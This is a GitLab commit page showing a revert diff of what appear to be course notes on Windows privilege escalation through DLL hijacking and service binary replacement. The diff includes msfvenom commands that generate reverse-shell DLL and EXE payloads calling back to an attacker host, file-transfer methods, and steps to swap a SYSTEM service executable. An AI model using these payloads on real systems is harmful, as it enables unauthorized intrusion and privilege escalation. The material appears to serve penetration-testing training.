UNCLASSIFIED

Skip to content
Snippets Groups Projects
Commit 222bc5f9 authored by Bryan Gagne's avatar Bryan Gagne
Browse files

Merge branch 'revert-03cffc0f' into 'master'

Revert "Merge branch 'rocky.z.wilson-master-patch-27459' into 'master'"

See merge request !66
parents 4b6e65c4 06f3113d
1 merge request!66Revert "Merge branch 'rocky.z.wilson-master-patch-27459' into 'master'"
Pipeline #83885 passed with stages
in 1 minute and 21 seconds
......@@ -380,9 +380,6 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
Once the malicious dll has been createdit must be uploaded to the host. Use scp, ftp, nc, python simple HTTP server, or copying and pasting base64 dump of file.
. Alternative method for DLL creation using MSFVenom
* ``msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f dll > bad.dll``
*Transfering the DLL* +
Once the malicious dll has been created, it must be uploaded to the host. Use of ``scp``, ``ftp``, ``nc``, ``python simple HTTP server``, or ``copying base64 output``.
......@@ -458,8 +455,6 @@ NOTE: We are interested in binaries running as *SYSTEM* in locations where *BUIL
*Exploiting a vulnerable Service* +
The overall intent is to replace the legitimate service with an executable that will allow an attacker to accomplish their objective.
. (Optional) Create a malicious executable file via MSFVenom
*`` msfvenom -p windows/shell_reverse_tcp LHOST=10.50.x.x LPORT=4444 -f exe > 7z.exe
. Create a backup copy of 7z.exe
* `` copy 7z.exe 7z.blk.exe``
. Copy a malicious executable into 7z.exe old location
......
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment